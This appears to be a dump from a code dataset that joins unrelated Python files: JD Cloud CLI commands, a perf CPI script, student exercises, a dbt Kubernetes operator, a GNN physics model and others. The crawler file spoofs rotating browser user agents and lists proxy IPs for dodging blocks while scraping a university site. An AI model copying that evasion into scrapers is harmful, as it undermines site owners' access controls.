(['--capacity-types'], dict(help="""(array: int) <p>查询用量数据类型:</p><br><code>1000040</code>:标准存储<br><code>1000041</code>:低冗余存储<br><code>1000042</code>:归档存储<br><code>1000043</code>归档overHead存储:<br><code>1000044</code>低频存储:<br><code>1000045</code>低频overHead存储:<br><code>1</code>:内网GET流量<br><code>2</code>:内网HEAD流量<br><code>3</code>:内网PUT流量<br><code>4</code>:内网POST流量<br><code>5</code>:内网DELETE流量<br><code>6</code>:内网OPTIONS流量<br><code>7</code>:内网TRACE流量<br><code>11</code>:外网GET流量<br><code>12</code>:外网HEAD流量<br><code>13</code>:外网PUT流量<br><code>14</code>:外网POST流量<br><code>15</code>:外网DELETE流量<br><code>16</code>:外网OPTIONS流量<br><code>17</code>:外网TRACE流量<br><code>21</code>:CDN GET流量<br><code>22</code>:CDN HEAD流量<br><code>23</code>:CDN PUT流量<br><code>24</code>:CDN POST流量<br><code>25</code>:CDN DELETE流量<br><code>26</code>:CDN OPTIONS流量<br><code>27</code>:CDN TRACE流量<br><code>31</code>:内网GET数<br><code>32</code>:内网HEAD数<br><code>33</code>:内网PUT数<br><code>34</code>:内网POST数<br><code>35</code>:内网DELETE数<br><code>36</code>:内网OPTIONS数<br><code>37</code>:内网TRACE数<br><code>51</code>:外网GET数<br><code>52</code>:外网HEAD数<br><code>53</code>:外网PUT数<br><code>54</code>:外网POST数<br><code>55</code>:外网DELETE数<br><code>56</code>:外网OPTIONS数<br><code>57</code>:外网TRACE数<br><code>61</code>:CDN GET数<br><code>62</code>:CDN HEAD数<br><code>63</code>:CDN PUT数<br><code>64</code>:CDN POST数<br><code>65</code>:CDN DELETE数<br><code>66</code>:CDN OPTIONS数<br><code>67</code>:CDN TRACE数<br><code>71</code>:归档提前删除<br><code>72</code>:低频提前删除<br><code>81</code>:归档取回Bulk<br><code>82</code>:归档取回Std<br><code>83</code>:归档取回Exp<br><code>84</code>:低频数据取回; """, dest='capacityTypes', type=int, required=True)),
(['--begin-time'], dict(help="""(string) 开始时间,使用UTC时间,格式为:YYYY-MM-DDTHH:mm:ss'Z' """, dest='beginTime', required=False)),
(['--end-time'], dict(help="""(string) 结束时间,使用UTC时间,格式为:YYYY-MM-DDTHH:mm:ss'Z' """, dest='endTime', required=False)),
(['--period-type'], dict(help="""(int) 查询数据的聚合方式:<br><code>0</code>:all, 最大查询区间365天 <br><code>1</code>:hour,最大查询区间31天。默认1<br><code>2</code>:day, 最大查询区间365天。 """, dest='periodType', type=int, required=False)),
(['--method'], dict(help="""(int) 返回数据的方式: <code>1</code>:recent(区间值), <code>2</code>:current(当前值。method = 2 时如果查询当前值时传入beginTime,则按照beginTime时间来进行查询;如果不传beginTime,则按照后端系统时间查询。) """, dest='method', type=int, required=True)),
(['--input-json'], dict(help='(json) 以json字符串或文件绝对路径形式作为输入参数。\n字符串方式举例:--input-json \'{"field":"value"}\';\n文件格式举例:--input-json file:///xxxx.json', dest='input_json', required=False)),
(['--headers'], dict(help="""(json) 用户自定义Header,举例:'{"x-jdcloud-security-token":"abc","test":"123"}'""", dest='headers', required=False)),
],
formatter_class=RawTextHelpFormatter,
help=''' 根据type获取指定bucket用量数据 ''',
description='''
根据type获取指定bucket用量数据。
示例: jdc ossopenapi get-single-bucket-capacity --bucket-name xxx --capacity-types [0] --method 0
''',
)
def get_single_bucket_capacity(self):
client_factory = ClientFactory('ossopenapi')
client = client_factory.get(self.app)
if client is None:
return
try:
from jdcloud_sdk.services.ossopenapi.apis.GetSingleBucketCapacityRequest import GetSingleBucketCapacityRequest
params_dict = collect_user_args(self.app)
headers = collect_user_headers(self.app)
req = GetSingleBucketCapacityRequest(params_dict, headers)
resp = client.send(req)
Printer.print_result(resp)
except ImportError:
print('{"error":"This api is not supported, please use the newer version"}')
except Exception as e:
print(e)
@expose(
arguments=[
(['--region-id'], dict(help="""(string) 区域ID """, dest='regionId', required=False)),
(['--bucket-name'], dict(help="""(string) Bucket名称 """, dest='bucketName', required=True)),
(['--input-json'], dict(help='(json) 以json字符串或文件绝对路径形式作为输入参数。\n字符串方式举例:--input-json \'{"field":"value"}\';\n文件格式举例:--input-json file:///xxxx.json', dest='input_json', required=False)),
(['--headers'], dict(help="""(json) 用户自定义Header,举例:'{"x-jdcloud-security-token":"abc","test":"123"}'""", dest='headers', required=False)),
],
formatter_class=RawTextHelpFormatter,
help=''' 获取回源配置 ''',
description='''
获取回源配置。
示例: jdc ossopenapi get-back-source-configuration --bucket-name xxx
''',
)
def get_back_source_configuration(self):
client_factory = ClientFactory('ossopenapi')
client = client_factory.get(self.app)
if client is None:
return
try:
from jdcloud_sdk.services.ossopenapi.apis.GetBackSourceConfigurationRequest import GetBackSourceConfigurationRequest
params_dict = collect_user_args(self.app)
headers = collect_user_headers(self.app)
req = GetBackSourceConfigurationRequest(params_dict, headers)
resp = client.send(req)
Printer.print_result(resp)
except ImportError:
print('{"error":"This api is not supported, please use the newer version"}')
except Exception as e:
print(e)
@expose(
arguments=[
(['--region-id'], dict(help="""(string) 区域ID """, dest='regionId', required=False)),
(['--bucket-name'], dict(help="""(string) Bucket名称 """, dest='bucketName', required=True)),
(['--back-source-rules'], dict(help="""(array: backSourceRule) 回源配置规则 """, dest='backSourceRules', required=False)),
(['--input-json'], dict(help='(json) 以json字符串或文件绝对路径形式作为输入参数。\n字符串方式举例:--input-json \'{"field":"value"}\';\n文件格式举例:--input-json file:///xxxx.json', dest='input_json', required=False)),
(['--headers'], dict(help="""(json) 用户自定义Header,举例:'{"x-jdcloud-security-token":"abc","test":"123"}'""", dest='headers', required=False)),
],
formatter_class=RawTextHelpFormatter,
help=''' 添加修改回源配置 ''',
description='''
添加修改回源配置。
示例: jdc ossopenapi put-back-source-configuration --bucket-name xxx
''',
)
def put_back_source_configuration(self):
client_factory = ClientFactory('ossopenapi')
client = client_factory.get(self.app)
if client is None:
return
try:
from jdcloud_sdk.services.ossopenapi.apis.PutBackSourceConfigurationRequest import PutBackSourceConfigurationRequest
params_dict = collect_user_args(self.app)
headers = collect_user_headers(self.app)
req = PutBackSourceConfigurationRequest(params_dict, headers)
resp = client.send(req)
Printer.print_result(resp)
except ImportError:
print('{"error":"This api is not supported, please use the newer version"}')
except Exception as e:
print(e)
@expose(
arguments=[
(['--region-id'], dict(help="""(string) 区域ID """, dest='regionId', required=False)),
(['--bucket-name'], dict(help="""(string) Bucket名称 """, dest='bucketName', required=True)),
(['--input-json'], dict(help='(json) 以json字符串或文件绝对路径形式作为输入参数。\n字符串方式举例:--input-json \'{"field":"value"}\';\n文件格式举例:--input-json file:///xxxx.json', dest='input_json', required=False)),
(['--headers'], dict(help="""(json) 用户自定义Header,举例:'{"x-jdcloud-security-token":"abc","test":"123"}'""", dest='headers', required=False)),
],
formatter_class=RawTextHelpFormatter,
help=''' 删除回源配置 ''',
description='''
删除回源配置。
示例: jdc ossopenapi delete-back-source-configuration --bucket-name xxx
''',
)
def delete_back_source_configuration(self):
client_factory = ClientFactory('ossopenapi')
client = client_factory.get(self.app)
if client is None:
return
try:
from jdcloud_sdk.services.ossopenapi.apis.DeleteBackSourceConfigurationRequest import DeleteBackSourceConfigurationRequest
params_dict = collect_user_args(self.app)
headers = collect_user_headers(self.app)
req = DeleteBackSourceConfigurationRequest(params_dict, headers)
resp = client.send(req)
Printer.print_result(resp)
except ImportError:
print('{"error":"This api is not supported, please use the newer version"}')
except Exception as e:
print(e)
@expose(
arguments=[
(['--api'], dict(help="""(string) api name """, choices=['get-single-bucket-capacity','get-back-source-configuration','put-back-source-configuration','delete-back-source-configuration',], required=True)),
],
formatter_class=RawTextHelpFormatter,
help=''' 生成单个API接口的json骨架空字符串 ''',
description='''
生成单个API接口的json骨架空字符串。
示例: jdc nc generate-skeleton --api describeContainer ''',
)
def generate_skeleton(self):
skeleton = Skeleton('ossopenapi', self.app.pargs.api)
skeleton.show()
| 10,879 | 4,045 |
# SPDX-License-Identifier: GPL-2.0
from __future__ import print_function
data = {}
times = []
threads = []
cpus = []
def get_key(time, event, cpu, thread):
return "%d-%s-%d-%d" % (time, event, cpu, thread)
def store_key(time, cpu, thread):
if (time not in times):
times.append(time)
if (cpu not in cpus):
cpus.append(cpu)
if (thread not in threads):
threads.append(thread)
def store(time, event, cpu, thread, val, ena, run):
#print("event %s cpu %d, thread %d, time %d, val %d, ena %d, run %d" %
# (event, cpu, thread, time, val, ena, run))
store_key(time, cpu, thread)
key = get_key(time, event, cpu, thread)
data[key] = [ val, ena, run]
def get(time, event, cpu, thread):
key = get_key(time, event, cpu, thread)
return data[key][0]
def stat__cycles_k(cpu, thread, time, val, ena, run):
store(time, "cycles", cpu, thread, val, ena, run);
def stat__instructions_k(cpu, thread, time, val, ena, run):
store(time, "instructions", cpu, thread, val, ena, run);
def stat__cycles_u(cpu, thread, time, val, ena, run):
store(time, "cycles", cpu, thread, val, ena, run);
def stat__instructions_u(cpu, thread, time, val, ena, run):
store(time, "instructions", cpu, thread, val, ena, run);
def stat__cycles(cpu, thread, time, val, ena, run):
store(time, "cycles", cpu, thread, val, ena, run);
def stat__instructions(cpu, thread, time, val, ena, run):
store(time, "instructions", cpu, thread, val, ena, run);
def stat__interval(time):
for cpu in cpus:
for thread in threads:
cyc = get(time, "cycles", cpu, thread)
ins = get(time, "instructions", cpu, thread)
cpi = 0
if ins != 0:
cpi = cyc/float(ins)
print("%15f: cpu %d, thread %d -> cpi %f (%d/%d)" % (time/(float(1000000000)), cpu, thread, cpi, cyc, ins))
def trace_end():
pass
# XXX trace_end callback could be used as an alternative place
# to compute same values as in the script above:
#
# for time in times:
# for cpu in cpus:
# for thread in threads:
# cyc = get(time, "cycles", cpu, thread)
# ins = get(time, "instructions", cpu, thread)
#
# if ins != 0:
# cpi = cyc/float(ins)
#
# print("time %.9f, cpu %d, thread %d -> cpi %f" % (time/(float(1000000000)), cpu, thread, cpi))
| 2,444 | 894 |
# 2. Для списка реализовать обмен значений соседних элементов, т.е. Значениями обмениваются элементы с индексами 0 и
# 1, 2 и 3 и т.д. При нечетном количестве элементов последний сохранить на своем месте. Для заполнения списка
# элементов необходимо использовать функцию input().
my_list = []
list_len = input("Сколько элементов хотите ввести? ")
while (not list_len.isdecimal()) or int(list_len) == 0:
list_len = input("Нужно ввести натуральное число! ")
list_len = int(list_len)
while len(my_list) < list_len:
my_list.append(input("#"))
print(my_list)
for index, elem in enumerate(my_list):
if index % 2 == 0 and index < len(my_list) - 1:
my_list[index], my_list[index + 1] = my_list[index + 1], my_list[index]
print(my_list)
| 751 | 299 |
import os
import yaml
class ProjectData:
def __init__(self, name, sig):
self.name = name
self.sig = sig
class RpmData:
def __init__(self, name):
self.name = name
self.id = ''
self.short_name = ''
self.arch = ''
self.group = ''
self.description = ''
self.requires = []
self.provides = []
self.oe_release = ''
self.sig = ''
self.project = ''
def to_dict(self):
rpm_dict = {
'name': self.name,
'short_name': self.short_name,
'arch': self.arch,
'group': self.group,
'description': self.description,
'requires': self.requires,
'provides': self.provides,
'oe_release': self.oe_release,
'sig': self.sig,
'project': self.project
}
return rpm_dict
class SigData:
def __init__(self, name):
self.name = name
self.mentors = []
self.maintainers = []
self.committers = []
self.description = ''
def to_dict(self):
sig_dict = {
'name': self.name,
'mentors': self.mentors,
'maintainers': self.maintainers,
'committers': self.committers,
'description': self.description
}
return sig_dict
def parse_sig_yaml(self, file_path):
with open(file_path, 'r') as sig_yaml:
yaml_data = yaml.load(sig_yaml, Loader=yaml.SafeLoader)
self.description = yaml_data.get('description')
self.mentors = yaml_data.get('mentors')
self.maintainers = yaml_data.get('maintainers')
self.committers = yaml_data.get('committers')
| 1,759 | 541 |
#!/usr/bin/env python3
import functools
def count_ways(coins, total):
length = len(coins)
@functools.lru_cache(maxsize=None)
def _solve(index, subtot):
value = coins[index]
return sum(solve(index + 1, next_subtot)
for next_subtot in range(subtot, -1, -value))
def solve(index, subtot):
if subtot == 0:
return 1
if index == length:
return 0
return _solve(index, subtot)
return solve(0, total)
def read_record(length):
ret = list(map(int, input().split()))
if len(ret) != length:
raise ValueError('wrong record length')
return ret
def run():
total, length = read_record(2)
coins = read_record(length)
print(count_ways(coins, total))
if __name__ == '__main__':
run()
| 812 | 279 |
import math
import random
import time
import re
from queue import Queue
import urllib.request
import urllib.error
import jieba
from bs4 import BeautifulSoup
urlSet = set()
urlList = []
doc = 0
que = Queue()
user_agents = [
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0'
]
ipList = ["112.85.129.100:9999", "112.85.175.4:9999", "112.87.70.92:9999"]
# proxy_support = urllib.request.ProxyHandler({"http": random.choice(ipList)})
# opener = urllib.request.build_opener(proxy_support)
# urllib.request.install_opener(opener)
def get_html(url):
req = urllib.request.Request(url=url, headers={'User-Agent': random.choice(user_agents)})
link = urllib.request.urlopen(req, timeout=1)
return link.read()
def getSave(url):
soup = BeautifulSoup(get_html(url), 'html.parser') # 初始化BeautifulSoup库,并设置解析器
# 提取超链接
for a in soup.findAll('a', href=True):
u = a.get("href")
if u and ('@suda.edu.cn' not in u) and ("javascript" not in u):
if u[0:4] == "http" and "suda" not in u:
break
if u[0:4] != "http":
if u[0] == '/':
u = re.findall("http.*edu.cn", url)[0]+u
else:
site = re.findall("http.*/", url)[0]
if site[-2] == '/':
site = re.findall("http.*/", url+'/')[0]
u = site+u
if u[-1] == '/':
u = u[0:len(u)-1]
if u not in urlSet:
que.put(u)
urlSet.add(u)
# 提取正文
[script.extract() for script in soup.findAll('script')]
[style.extract() for style in soup.findAll('style')]
soup.prettify()
content = re.sub("<[^>]*>", '', soup.prettify())
content = re.sub("\s{2,}", "\n", content)
with open("{}".format(doc), "w", encoding='utf-8') as f:
f.write(content)
def search():
query = input("网站爬取完毕,请输入查询:").split() # 输入查询
queryDict = {} # 单词在查询中的出现次数
for i in query:
if i in queryDict:
queryDict[i] += 1
else:
queryDict[i] = 1
queryDf = {i: 0 for i in queryDict} # 用来之后记录查询词的df值,默认不存在为0
fenciDict = [] # 各个文档分词结果的单词计数
for i in range(len(urlList)):
with open("{}".format(i), "r", encoding='utf-8') as f:
s = f.read()
fenci = jieba.lcut_for_search(s)
fenciSet = set(fenci)
fenciDict.append({i: fenci.count(i) for i in fenciSet})
# 与上面对query的处理类似
for word in queryDf:
if word in fenciDict[i]:
queryDf[word] += 1
# 若关键词在文档中出现,则df加1
similarList = []
for i in range(len(urlList)):
sum_qd = 0.0 # 作分子
sum_q2 = 0.0
sum_d2 = 0.0 # sum_q2*sum_d2的平方根作分母
for word in queryDict:
w_query = 1.0 + math.log10(queryDict[word]) # word在query中的tf-idf权重
w_doc = 0 # word在第i个文档中的tf-idf权重
if word in fenciDict[i]:
w_doc = (1.0 + math.log10(fenciDict[i][word])) * math.log10(10000.0 / queryDf[word])
sum_qd += w_query * w_doc
sum_q2 += w_query ** 2
sum_d2 += w_doc ** 2
similar = 0.0 # 余弦相似度
len_q2d2 = math.sqrt(sum_q2 * sum_d2)
if math.fabs(len_q2d2) > 1e-5:
similar = sum_qd / len_q2d2
similarList.append((i, similar)) # 文档编号和余弦相似度的元祖
similarList.sort(key=lambda x: x[1], reverse=True)
for i in range(min(10,len(similarList))):
d = similarList[i][0]
print(urlList[d], similarList[i][1])
if __name__ == "__main__":
que.put("http://www.suda.edu.cn")
#while not que.empty():
for i in range(100): #可以选择for控制循环次数进行测试
url = que.get()
urlList.append(url)
#print(url) #打印出访问的网站
flag = False
for i in range(3): # 超时超过三次即认为访问失败
try:
getSave(url)
flag = True
break
except:
pass
if flag:
doc += 1
else:
#print("false") # 可体现出什么网站访问失败
pass
# 控制访问时间间隔,可调整
time.sleep(0.2)
if doc % 10 == 0:
time.sleep(1.5)
search()
| 4,686 | 1,995 |
import logging
import os
from typing import List, Dict
from airflow.contrib.operators.kubernetes_pod_operator import KubernetesPodOperator
from airflow.sensors.base_sensor_operator import apply_defaults
from dop.component.configuration.env import env_config
from dop.airflow_module.operator import dbt_operator_helper
# List of files generated by dbt docs generate
# https://docs.getdbt.com/reference/commands/cmd-docs
DBT_DOC_FILES = ["index.html", "manifest.json", "catalog.json"]
DBT_DOC_FOLDER = "target"
DBT_USER = "dbtuser"
DBT_RUN_RESULTS_PATH = "target/run_results.json"
# See: https://kubernetes.io/docs/concepts/scheduling-eviction/assign-pod-node/#affinity-and-anti-affinity
node_pool_affinity = {
"nodeAffinity": {
# requiredDuringSchedulingIgnoredDuringExecution means in order
# for a pod to be scheduled on a node, the node must have the
# specified labels. However, if labels on a node change at
# runtime such that the affinity rules on a pod are no longer
# met, the pod will still continue to run on the node.
"requiredDuringSchedulingIgnoredDuringExecution": {
"nodeSelectorTerms": [
{
"matchExpressions": [
{
# When nodepools are created in Google Kubernetes
# Engine, the nodes inside of that nodepool are
# automatically assigned the label
# 'cloud.google.com/gke-nodepool' with the value of
# the nodepool's name.
"key": "cloud.google.com/gke-nodepool",
"operator": "In",
"values": ["kubernetes-task-pool"],
}
]
}
]
}
}
}
def retrieve_commit_hash():
with open(
os.path.sep.join([env_config.service_project_path, ".commit-hash"])
) as fp:
return fp.read()
class DbtK8Operator(KubernetesPodOperator):
template_fields = (
"action",
"target",
"dbt_project_name",
"image_tag",
"dbt_arguments",
"gcr_pull_secret_name",
"arguments",
)
ui_color = "#FF694B"
@apply_defaults
def __init__(
self,
dbt_project_name: str,
dbt_version: str,
dbt_arguments: List[Dict],
*args,
**kwargs,
):
"""
:param dbt_project_name: the name for the dbt project name inline with what's defined in `.dbt-project-repos.json`
:param dbt_version: Not used
:param args:
:param kwargs: must contain the Task entity
"""
task = kwargs["task"]
self.dbt_project_name = dbt_project_name
self.dbt_version = "N/A, this is fixed in the docker image"
self.action = task.kind.action
self.target = task.kind.target
self.dbt_arguments = dbt_arguments
self.gcr_pull_secret_name = env_config.gcr_pull_secret_name
self.image_tag = retrieve_commit_hash()
self._full_refresh = (
False # used to trigger DBT full refresh, modified via execute() override
)
self.arguments = [self.parse_bash_command()]
super(DbtK8Operator, self).__init__(
name=kwargs["task_id"],
cmds=["/bin/bash", "-c"],
arguments=self.arguments,
get_logs=True,
namespace="default",
image=f"eu.gcr.io/{env_config.infra_project_id}/dop-dbt:{self.image_tag}",
is_delete_operator_pod=True,
env_vars={
"DOP_PROJECT_ID": env_config.project_id,
"DOP_LOCATION": env_config.location,
},
image_pull_secrets=self.gcr_pull_secret_name,
affinity=node_pool_affinity,
*args,
**kwargs,
)
def execute(self, context):
"""
Override the parent method to ingest required contexts
"""
dag_run_conf = context["dag_run"].conf if context["dag_run"].conf else {}
full_refresh = dag_run_conf.get("full_refresh", False)
self._full_refresh = full_refresh
logging.info(f"### IS FULL REFRESH ENABLED: {self._full_refresh}")
self.arguments = [self.parse_bash_command(context=context)]
logging.info(f"### Updated arguments: {self.arguments}")
super(DbtK8Operator, self).execute(context=context)
def parse_bash_command(self, context=None):
full_refresh_cmd = ""
if self.target != "run":
full_refresh_cmd = ""
elif self.dbt_arguments:
if self._full_refresh and "--full-refresh" not in [
arg.get("option") for arg in self.dbt_arguments
]:
full_refresh_cmd = "--full-refresh"
elif self._full_refresh:
full_refresh_cmd = "--full-refresh"
cmd_for_additional_arguments = ""
# docs arguments are only used to copy files to GCS, not in the task execution
if self.dbt_arguments and self.target != "docs generate":
cmd_for_additional_arguments = dbt_operator_helper.implode_arguments(
dbt_arguments=self.dbt_arguments
)
cmd_to_run_dbt = (
f"pipenv run dbt --no-use-colors {self.target} --project-dir ./{self.dbt_project_name}"
f" --vars {dbt_operator_helper.parsed_cmd_airflow_context_vars(context=context)}"
f" {cmd_for_additional_arguments}"
f" {full_refresh_cmd};"
f" gsutil cp /home/{DBT_USER}/{self.dbt_project_name}/{DBT_RUN_RESULTS_PATH} gs://{os.getenv('GCS_BUCKET')}/dbt/{DBT_RUN_RESULTS_PATH}"
)
if self.target == "docs generate":
command = self.copy_docs_to_gcs_command()
if command:
cmd_to_run_dbt += f"; {command}"
return cmd_to_run_dbt
def copy_docs_to_gcs_command(self):
"""
Generate gsutil command line to copy doc files generated with dbt docs generate to GCS
"""
command = []
gcs_bucket = dbt_operator_helper.extract_argument(
self.dbt_arguments, "--bucket"
)
if not gcs_bucket:
logging.warning("No bucket argument provided. Skipping copy to GCS")
return ""
gcs_path = dbt_operator_helper.extract_argument(
self.dbt_arguments, "--bucket-path", ""
)
for doc_file in DBT_DOC_FILES:
doc_file_path = (
f"/home/{DBT_USER}/{self.dbt_project_name}/{DBT_DOC_FOLDER}/{doc_file}"
)
logging.info(f"Copying {doc_file} to gs://{gcs_bucket}/{gcs_path}")
command.append(
f"gsutil cp {doc_file_path} gs://{gcs_bucket}/{gcs_path}/{doc_file}"
)
return ";".join(command)
def post_execute(self, context, result=None):
"""
This hook is triggered right after self.execute() is called.
It is passed the execution context and any results returned by the
operator.
"""
dbt_operator_helper.save_run_results_in_bq(
env_config.project_id,
self.dbt_project_name,
f"gs://{os.getenv('GCS_BUCKET')}/dbt/{DBT_RUN_RESULTS_PATH}",
)
| 7,398 | 2,215 |
"""
birthday.py
Author: Jordan
Credit: none
Assignment:
Your program will ask the user the following questions, in this order:
1. Their name.
2. The name of the month they were born in (e.g. "September").
3. The year they were born in (e.g. "1962").
4. The day they were born on (e.g. "11").
If the user's birthday fell on October 31, then respond with:
You were born on Halloween!
If the user's birthday fell on today's date, then respond with:
Happy birthday!
Otherwise respond with a statement like this:
Peter, you are a winter baby of the nineties.
Example Session
Hello, what is your name? Eric
Hi Eric, what was the name of the month you were born in? September
And what year were you born in, Eric? 1972
And the day? 11
Eric, you are a fall baby of the stone age.
"""
name=str(input("Hello, what is your name? "))
month=str(input("Hi "+name+", what was the name of the month you were born in? "))
year=int(input("And what year were you born in, "+name+"? "))
day=int(input("And the day? "))
months = ["" , "January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December" ""]
winter=["December","January","February"]
spring=['March','May','April']
summer=['June','July','August']
fall=['September','October','November']
from datetime import datetime
from calendar import month_name
todaymonth = datetime.today().month
todaydate = datetime.today().day
birthmonth = months[todaymonth]
if month==birthmonth and day==todaydate:
print("Happy birthday!")
elif month=="October" and day==31:
print("You were born on Halloween!")
elif month in winter and year>=2000:
print(str(name + ", you are a winter baby of the two thousands."))
elif month in spring and year>=2000:
print(str(name + ", you are a spring baby of the two thousands."))
elif month in summer and year>=2000:
print(str(name +", you are a summer baby of the two thousands."))
elif month in fall and year>=2000:
print(str(name + ", you are a fall baby of the two thousands."))
elif month in winter and year>=1990 and year<= 2000:
print(str(name + ", you are a winter baby of the nineties."))
elif month in spring and year>=1990 and year<= 2000:
print(str(name + ", you are a spring baby of the nineties."))
elif month in summer and year>=1990 and year<=2000:
print(str(name + ", you are a summer baby of the nineties."))
elif month in fall and year>=1990 and year<=2000:
print(str(name + ", you are a fall baby of the nineties."))
elif month in winter and year>=1980 and year<= 1990:
print(str(name + ", you are a winter baby of the eighties."))
elif month in spring and year>=1980 and year<= 1990:
print(str(name + ", you are a spring baby of the eighties."))
elif month in summer and year>=1980 and year<=1990:
print(str(name + ", you are a summer baby of the eighties."))
elif month in fall and year>=1980 and year<=1990:
print(str(name + ", you are a fall baby of the eighties."))
elif month in winter and year<=1980:
print(str(name + ", you are a winter baby of the Stone Age."))
elif month in spring and year<=1980:
print(str(name + ", you are a spring baby of the Stone Age."))
elif month in summer and year<=1980:
print(str(name +", you are a summer baby of the Stone Age."))
elif month in fall and year<=1980:
print(str(name + ", you are a fall baby of the Stone Age."))
| 3,471 | 1,172 |
import torch
import torch.nn as nn
import torch.nn.functional as F
from config import _C as C
from models.layers.GNN_dmwater import GraphNet
from scipy import spatial
import numpy as np
import utils
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.node_dim_in = C.NET.NODE_FEAT_DIM_IN
self.edge_dim_in = C.NET.EDGE_FEAT_DIM_IN
self.hidden_size = C.NET.HIDDEN_SIZE
self.out_size = C.NET.OUT_SIZE
num_layers = C.NET.GNN_LAYER
self.particle_emb = nn.Embedding(C.NUM_PARTICLE_TYPES, C.NET.PARTICLE_EMB_SIZE)
self.node_encoder = nn.Sequential(
nn.Linear(self.node_dim_in, self.hidden_size),
nn.ReLU(),
nn.Linear(self.hidden_size, self.hidden_size),
nn.ReLU(),
nn.Linear(self.hidden_size, self.hidden_size),
nn.LayerNorm(self.hidden_size)
)
self.edge_encoder = nn.Sequential(
nn.Linear(self.edge_dim_in, self.hidden_size),
nn.ReLU(),
nn.Linear(self.hidden_size, self.hidden_size),
nn.ReLU(),
nn.Linear(self.hidden_size, self.hidden_size),
nn.LayerNorm(self.hidden_size)
)
self.graph = GraphNet(layers=num_layers)
self.decoder = nn.Sequential(
nn.Linear(self.hidden_size, self.hidden_size),
nn.ReLU(),
nn.Linear(self.hidden_size, self.hidden_size),
nn.ReLU(),
nn.Linear(self.hidden_size, self.out_size),
)
def _construct_graph_nodes(self, poss, particle_type, metadata):
vels = utils.time_diff(poss)
vels = (vels - metadata['vel_mean'])/metadata['vel_std']
n_vel, d_vel = vels.shape[1], vels.shape[2]
assert n_vel == C.N_HIS - 1
vels = vels.reshape([-1, n_vel*d_vel])
pos_last = poss[:, -1]
dist_to_walls = torch.cat(
[pos_last - metadata['bounds'][:, 0],
-pos_last + metadata['bounds'][:, 1]], 1)
dist_to_walls = torch.clip(dist_to_walls/C.NET.RADIUS, -1, 1)
type_emb = self.particle_emb(particle_type)
node_attr = torch.cat([vels,
dist_to_walls,
type_emb], axis=1)
return node_attr
def _construct_graph_edges(self, pos):
device = pos.device
collapsed = False
n_particles = pos.shape[0]
# Calculate undirected edge list using KDTree
point_tree = spatial.cKDTree(pos.detach().cpu().numpy())
undirected_pairs = np.array(list(point_tree.query_pairs(C.NET.RADIUS, p=2))).T
undirected_pairs = torch.from_numpy(undirected_pairs).to(device)
pairs = torch.cat([undirected_pairs, torch.flip(undirected_pairs, dims=(0,))], dim=1).long()
if C.NET.SELF_EDGE:
self_pairs = torch.stack([torch.arange(n_particles, device=device),
torch.arange(n_particles, device=device)])
pairs = torch.cat([pairs, self_pairs], dim=1)
# check if prediction collapsed in long term unrolling
if pairs.shape[1] > C.NET.MAX_EDGE_PER_PARTICLE * n_particles:
collapsed = True
senders = pairs[0]
receivers = pairs[1]
# Calculate corresponding relative edge attributes (distance vector + magnitude)
dist_vec = (pos[senders] - pos[receivers])
dist_vec = dist_vec / C.NET.RADIUS
dist = torch.linalg.norm(dist_vec, dim=1, keepdims=True)
edges = torch.cat([dist_vec, dist], dim=1)
return edges, senders, receivers, collapsed
def forward(self, poss, particle_type, metadata, nonk_mask, tgt_poss, num_rollouts=10, phase='train'):
pred_accns = []
pred_poss = []
for i in range(num_rollouts):
nodes = self._construct_graph_nodes(poss, particle_type, metadata)
edges, senders, receivers, collapsed = self._construct_graph_edges(poss[:, -1])
nodes = self.node_encoder(nodes)
edges = self.edge_encoder(edges)
nodes, edges = self.graph(nodes, edges, senders, receivers)
pred_accn = self.decoder(nodes)
pred_acc = pred_accn * metadata['acc_std'] + metadata['acc_mean']
pred_accns.append(pred_accn)
prev_vel = poss[:, -1] - poss[:, -2]
pred_pos = poss[:, -1] + prev_vel + pred_acc
# replace kinematic nodes
pred_pos = torch.where(nonk_mask[:, None].bool(), pred_pos, tgt_poss[:, i])
poss = torch.cat([poss[:, 1:], pred_pos[:, None]], dim=1)
pred_poss.append(pred_pos)
if collapsed:
break
pred_accns = torch.stack(pred_accns).permute(1, 0, 2)
pred_poss = torch.stack(pred_poss).permute(1, 0, 2)
outputs = {
'pred_accns': pred_accns,
'pred_poss': pred_poss,
'pred_collaposed': collapsed
}
return outputs
| 5,093 | 1,749 |
from tensorflow import keras
import numpy as np
data_x = np.random.normal(size=[1000, 1])
noise = np.random.normal(size=[1000, 1]) * 0.2
data_y = data_x * 3. + 2. + noise
train_x, train_y = data_x[:900], data_y[:900]
test_x, test_y = data_x[900:], data_y[900:]
# define your reusable layers in here
l1 = keras.layers.Dense(10, activation=keras.activations.relu)
class Model(keras.Model):
def __init__(self):
super(Model, self).__init__()
self.l1 = l1 # this is a reusable layer
self.l2 = keras.layers.Dense(1) # this is NOT a reusable layer
def call(self, x, training=None, mask=None):
x = self.l1(x)
x = self.l2(x)
return x
model1 = Model()
model2 = Model()
model1.build((None, 1))
model2.build((None, 1))
model1.compile(
optimizer=keras.optimizers.SGD(0.01),
loss=keras.losses.MeanSquaredError(),
metrics=[keras.metrics.MeanSquaredError()],
)
# train model1 for a while
model1.fit(train_x, train_y, batch_size=32, epochs=3, validation_split=0.2, shuffle=True)
print("l1 is reused: ", np.all(model1.l1.get_weights()[0] == model2.l1.get_weights()[0]))
print("l2 is reused: ", np.all(model1.l2.get_weights()[0] == model2.l2.get_weights()[0])) | 1,224 | 517 |
import colorama
def stringify(obj):
if not isinstance(obj, str):
obj = str(obj)
return obj
def red(obj):
return colorama.Fore.RED + stringify(obj) + "\033[39m"
def cyan(obj):
return colorama.Fore.CYAN + stringify(obj) + "\033[39m"
def green(obj):
return colorama.Fore.GREEN + stringify(obj) + "\033[39m"
def yellow(obj):
return colorama.Fore.YELLOW + stringify(obj) + "\033[39m"
def magenta(obj):
return colorama.Fore.MAGENTA + stringify(obj) + "\033[39m"
def white(obj):
return colorama.Fore.WHITE + stringify(obj) + "\033[39m"
